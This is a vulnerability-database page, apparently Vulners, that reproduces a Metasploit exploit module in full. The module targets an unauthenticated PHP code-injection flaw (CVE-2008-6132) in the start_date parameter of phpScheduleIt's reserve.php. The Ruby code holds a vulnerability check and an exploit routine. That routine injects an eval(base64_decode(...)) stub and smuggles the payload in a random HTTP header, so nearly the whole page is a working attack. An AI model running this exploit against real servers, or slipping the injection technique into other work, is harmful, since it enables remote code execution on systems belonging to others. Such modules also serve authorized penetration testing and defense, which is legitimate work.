Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMetasploit1337DAY-ID-17027
HistoryOct 25, 2011 - 12:00 a.m.

phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Injection

2011-10-2500:00:00
metasploit
0day.today
16

EPSS

0.818

Percentile

98.4%

JSON

Exploit for php platform in category web applications

##
# $Id: phpscheduleit_start_date.rb 14073 2011-10-26 18:06:12Z sinn3r $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name' => 'phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection',
            'Description'    => %q{
                    This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt
                software. This vulnerability is only exploitable when the magic_quotes_gpc PHP
                option is 'off'. Authentication is not required to exploit the bug.
 
                Version 1.2.10 and earlier of phpScheduleIt are affected.
            },
            'Author'         =>
                [
                    'EgiX',        # Vulnerability Discovery and Exploit
                    'juan vazquez' # Metasploit module
                ],
            'License'        => BSD_LICENSE,
            'Version'        => '$Revision: 14073 $',
            'References'     =>
                [
                    ['CVE', '2008-6132'],
                    ['OSVDB', '48797'],
                    ['BID', '31520'],
                    ['URL', 'http://www.exploit-db.com/exploits/6646/'],
                ],
            'Privileged'     => false,
            'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
            'Payload'        =>
                {
                    # max header length for Apache,
                    # http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
                    'Space'       => 8190,
                    'DisableNops' => true,
                    'Keys'        => ['php'],
                },
            'Targets'        => [ ['Automatic', { }] ],
            'DefaultTarget' => 0,
            'DisclosureDate' => 'Oct 1 2008'))
 
        register_options(
            [
                OptString.new('URI', [ true,  "The full URI path to phpScheduleIt", '/phpscheduleit']),
            ], self.class)
    end
 
    def check
        signature = rand_text_alpha(rand(10)+10)
        stub = "1').${print('#{signature}')}.${die};#"
        my_payload = "btnSubmit=1&start_date=#{stub}"
 
        if datastore['URI'][-1, 1] == "/"
            uri = datastore['URI'] + "reserve.php"
        else
            uri = datastore['URI'] + "/reserve.php"
        end
 
        print_status("Checking uri #{uri}")
 
        response = send_request_cgi({
            'method' => "POST",
            'global' => true,
            'uri' => uri,
            'headers' => {
                    'Referer' => uri,
                },
            'data' => "#{my_payload}"
        })
 
        if response.code == 200 and response.body =~ /#{signature}/
            return Exploit::CheckCode::Vulnerable
        end
 
        return Exploit::CheckCode::Safe
    end
 
    def exploit
        headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
        stub = "1').${error_reporting(0)}.${eval(base64_decode($_SERVER[HTTP_#{headername.gsub("-", "_")}]))};#"
        my_payload = "btnSubmit=1&start_date=#{stub}"
 
        if datastore['URI'][-1, 1] == "/"
            uri = datastore['URI'] + "reserve.php"
        else
            uri = datastore['URI'] + "/reserve.php"
        end
 
        print_status("Sending request for: #{uri}")
        print_status("Payload embedded in header: #{headername}")
 
        response = send_request_cgi({
            'method' => "POST",
            'global' => true,
            'uri' => uri,
            'headers' => {
                    headername  => Rex::Text.encode_base64(payload.encoded),
                    'Referer'   => uri
                },
            'data' => "#{my_payload}"
        }, 3)
 
        if response and response.code != 200
            print_error("Server returned a non-200 status code: (#{response.code})")
        end
 
        handler
    end
end



#  0day.today [2018-04-13]  #

Related

exploitdb 2
openvas 2
prion 2
cvelist 2
nvd 2
cve 2
nessus 1
packetstorm 1
metasploit 1
exploitdb
exploitdb
phpScheduleIt 1.2.10 - &#039;reserve.php&#039; Arbitrary Code Injection (Metasploit)
2011-10-26 00:00:00
phpScheduleIt 1.2.10 - &#039;reserve.php&#039; Remote Code Execution
2008-10-01 00:00:00
openvas
openvas
phpScheduleIt 'reserve.php' Remote Code Execution Vulnerability
2009-07-20 00:00:00
phpScheduleIt 'reserve.php' RCE Vulnerability
2009-07-20 00:00:00
prion
prion
Sql injection
2009-02-13 18:30:00
Sql injection
2009-03-05 02:30:00
cvelist
cvelist
CVE-2008-6132
2009-02-13 18:00:00
CVE-2009-0820
2009-03-05 02:00:00
nvd
nvd
CVE-2008-6132
2009-02-13 18:30:04
CVE-2009-0820
2009-03-05 02:30:00
cve
cve
CVE-2008-6132
2009-02-13 18:30:04
CVE-2009-0820
2009-03-05 02:30:00
nessus
nessus
phpScheduleIt reserve.php start_date Parameter Arbitrary Command Injection
2008-10-03 00:00:00
packetstorm
packetstorm
phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
2011-10-27 00:00:00
metasploit
metasploit
phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
2011-10-26 18:06:12

EPSS

0.818

Percentile

98.4%

JSON
Related for 1337DAY-ID-17027
exploitdb2openvas2prion2cvelist2nvd2cve2nessus1packetstorm1metasploit1